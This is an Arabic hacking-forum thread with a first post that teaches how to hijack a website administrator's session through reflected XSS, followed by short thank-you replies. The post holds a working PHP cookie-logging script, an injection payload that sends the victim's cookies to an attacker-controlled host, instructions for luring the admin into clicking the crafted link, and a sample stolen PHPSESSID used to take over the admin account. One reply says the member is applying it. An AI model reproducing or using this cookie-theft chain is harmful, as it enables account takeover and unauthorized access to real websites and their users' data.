اشترك في قناتنا ليصلك جديدنا

اشترك في قناتنا على اليوتيوب ليصلك جديدنا

كذلك الاعجاب بصفحتنا على الفيسبوك

سرقة الكوكيز والدخول للوحة التحكم

سرقة الكوكيز والدخول للوحة التحكم


النتائج 1 إلى 8 من 8

الموضوع: سرقة الكوكيز والدخول للوحة التحكم

  1. #1
    هكر مجتهد Array الصورة الرمزية lofe hak
    تاريخ التسجيل
    Oct 2012
    المشاركات
    243

    افتراضي سرقة الكوكيز والدخول للوحة التحكم



    بسم الله الرحمن الرحيم

    شرح اختراق الموقع عن طريق تغرة اكس اس اس (xss)

    الترغة هده منتشرة مثل تغرة السكيل بل تعتبر من تغرات الحقن

    الطريقة تعتمد على سرقة الكوكيز الخاصة بالادمن والدخول للوحة

    طبعا الكل يعرف كيف يتأكد من ان الموقع مصاب بالتغرة
    غالبا تضع في الرابط او في مكان البحث الكود التالي


    كود PHP:
    >***************("test")</script> 
    وطبعا في بعض الاحيان تحتاج الى تشفير الامر بالهيكس
    والمواقع موجودة لتشفير بالهيكس
    ^_^
    الطريقة تحتاج الى ثلاثة اشياء
    ان يسمح الموقع المصاب بتسجيل الاعضاء + ملف بي اتش بي مرفوع على اي موقع + ملف تكست فارغ باسم log.txt (تقوم برفعه مع ملف البي اتش بي)
    طبعا بعد التسجيل في الموقع
    ندخل بالعضوية الخاصة فينا
    ونقوم برفع الملف التالي من شل او استضافة تدعم رفع ملفات البي اتش بي

    هذا هو الملف


    كود PHP:
    <?php 

    function GetIP() 

        if (
    getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown")) 
            
    $ip getenv("HTTP_CLIENT_IP"); 
        else if (
    getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown")) 
            
    $ip getenv("HTTP_X_FORWARDED_FOR"); 
        else if (
    getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown")) 
            
    $ip getenv("REMOTE_ADDR"); 
        else if (isset(
    $_SERVER['REMOTE_ADDR']) &&  $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'],  "unknown")) 
            
    $ip $_SERVER['REMOTE_ADDR']; 
        else 
            
    $ip "unknown"
        return(
    $ip); 


    function 
    logData() 

        
    $ipLog="log.txt"
        $****** = 
    $_SERVER['QUERY_STRING']; 
        
    $register_globals = (bool) ini_get('register_gobals'); 
        if (
    $register_globals$ip getenv('REMOTE_ADDR'); 
        else 
    $ip GetIP(); 

        
    $rem_port $_SERVER['REMOTE_PORT']; 
        
    $user_agent $_SERVER['HTTP_USER_AGENT']; 
        
    $rqst_method $_SERVER['METHOD']; 
        
    $rem_host $_SERVER['REMOTE_HOST']; 
        
    $referer $_SERVER['HTTP_REFERER']; 
        
    $date=date ("l dS of F Y h:i:s A"); 
        
    $log=fopen("$ipLog""a+"); 

        if (
    preg_match("/\bhtm\b/i"$ipLog) || preg_match("/\bhtml\b/i"$ipLog)) 
            
    fputs($log"IP: $ip | PORT: $rem_port | HOST: $rem_host |  Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : }  $date | ******:  $****** <br>"); 
        else 
            
    fputs($log"IP: $ip | PORT: $rem_port | HOST: $rem_host |   Agent: $user_agent | METHOD: $rqst_method | REF: $referer |  DATE:  $date | ******:  $****** \n\n"); 
        
    fclose($log); 


    logData(); 

    ?>
    اوك الان رفعنا الملف على موقع مثلا
    http://server.com/file.php
    وهذا ملف اللوغ
    htp://server.com/log.txt
    والموقع المصاب هو
    http://target.com/search.php

    الان كل شيئ جهاز بقى فقط كود الحقن


    كود PHP:
    "><script ********=  "**********">********.********="http://server.com/file.php?******=" +   ********.******;********.********="http://www.target.com"</script> 
    الان طريقة الاختراق تعتمد على ارسال كود الحقن الى الادمن (الكود الاخير)
    طبعا في رسالة او على الاميل او اي شيئ
    المهم لازم يضغط كليك على الرابط اللي سيكون في النهاية

    كود PHP:
    http://target.com/search.php?q="><script ********=  "**********">********.********="http://yoursite.com/whateveryouwant.php?******="  +  ********.******;********.********="http://www.whateversite.com"</script> 


    تضع فقط كود الحقن بعد رابط الملف المصاب في الموقع وترسله الى الادمن
    لما يدخل الادمن على الرابط ستجد الكوكيز في ملف اللوع log.txt اللي رفعنا مع ملف البي اتش بي
    http:server.com/log.txt

    مثال

    كود:

    كود PHP:
    IPxxx.xxx.xxx.xxPORTxxxHOST:  |  AgentMozilla/5.0 (X11U;  Linux i686en-USrv:1.9.0.8Gecko/2009032711 Ubuntu/8.10 (intrepid)  Firefox/3.0.8 METHOD:  | REFhttp://target.com/search.php |  

    DATETuesday 9th 2013f April 2013 05:04:07 PM | ******:  ******=PHPSESSID=889c6594db2541db1666cefca7537373 
    طبعا اللي يهمنا في اللوغ هو
    PHPSESSID=889c6594db2541db1666cefca7537373
    السيشن اي دي
    ومن خلالها نعدل على الكوكيز الخاص فينا باستعمال احدى ادوات تعديل الكوكيز
    وبمجرد عمل رفريش تجد نفسك ادمن


    بالتوفيق



  2. #2
    هكر مبتديء Array
    تاريخ التسجيل
    Jan 2013
    المشاركات
    8

    افتراضي رد: سرقة الكوكيز والدخول للوحة التحكم

    مشكوور وجاري التطبييييق


  3. #3
    هكر مبتديء Array الصورة الرمزية crzyhckr
    تاريخ التسجيل
    Feb 2013
    المشاركات
    39

    افتراضي رد: سرقة الكوكيز والدخول للوحة التحكم

    ياريت تشرح فيديو عشان نفهم



  4. #4
    هكر مبتديء Array الصورة الرمزية SNIPER_X
    تاريخ التسجيل
    Mar 2013
    الدولة
    Syria
    المشاركات
    76

    افتراضي رد: سرقة الكوكيز والدخول للوحة التحكم

    مشكووور وواصل ...


  5. #5
    محظور Array
    تاريخ التسجيل
    Nov 2012
    الدولة
    في قلبي أمي
    المشاركات
    1,135

    افتراضي رد: سرقة الكوكيز والدخول للوحة التحكم

    مشكور على جهودك


  6. #6
    هكر نشيط Array الصورة الرمزية lost dream
    تاريخ التسجيل
    Dec 2012
    الدولة
    الاردن -- السعودية
    المشاركات
    115

    افتراضي رد: سرقة الكوكيز والدخول للوحة التحكم

    يعطيك الف عافية



  7. #7
    هكر مجتهد Array الصورة الرمزية كاسر المشاعر
    تاريخ التسجيل
    Nov 2012
    المشاركات
    525

    افتراضي رد: سرقة الكوكيز والدخول للوحة التحكم

    يسلمووووووووووووووو يا غالي...

    - - - تم التحديث - - -

    يسلمووووووووووووووو يا غالي...


  8. #8
    هكر مبتديء Array
    تاريخ التسجيل
    Feb 2013
    المشاركات
    31

    افتراضي رد: سرقة الكوكيز والدخول للوحة التحكم

    مشكوووووووووووووورررر


المواضيع المتشابهه

  1. ثغرة تدخلك للوحة التحكم بدون تسجيل البيانات
    بواسطة Iraqe Hacker في المنتدى قسم الثغرات
    مشاركات: 112
    آخر مشاركة: 04-14-2014, 03:21 PM
  2. اختراق منتديات vb والدخول الى cpanel
    بواسطة الحريف في المنتدى منتدى إختراق المنتديات
    مشاركات: 14
    آخر مشاركة: 08-19-2011, 03:36 AM
  3. مشكلة في ايجاد رابط الدخول للوحة التحكم
    بواسطة htc في المنتدى قسم المشاكل والإستفسارات
    مشاركات: 3
    آخر مشاركة: 05-07-2011, 03:36 PM

وجد الزوار هذه الصفحة بالبحث عن:

سرقة الكوكيز 2013

طريقة سرقة الكوكيز

سرقة كوكيز الفيس بوك

http:www.aljyyosh.comvbshowthread.phpt=46932

سرقة الكوكيز الخاص بالفيس بوك

كيفية سرقة الكوكيز جيوش الهكرزطريقة سرقة كوكيزاختراق رمز ادمن الوابكاما هو سكربت سرقة الكوكيزبرنامج سرقة الكوكيزرابط ملف سرقة الكوكيزاختراق الفيس بوك عن طريق سرقة الكوكيزسرقة كوكيز اي موقعكيفيه اختراق موقع الوابكا عن طريق الرابطبرنامج هكر الكوكيز طريقه كشف اكواد وابكاcookeis ما هو في الهكرطريقة سرقة ملفات من موقع أخر وابكاسكربت سرقة الكوكيز اكواد وابكا اختراق مجانيشرح اختراق موقع الوابكااختراق مواقع وابكاالكوكيز اختراقتهكير موقع وابكاطريقة سرقة كويكز

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •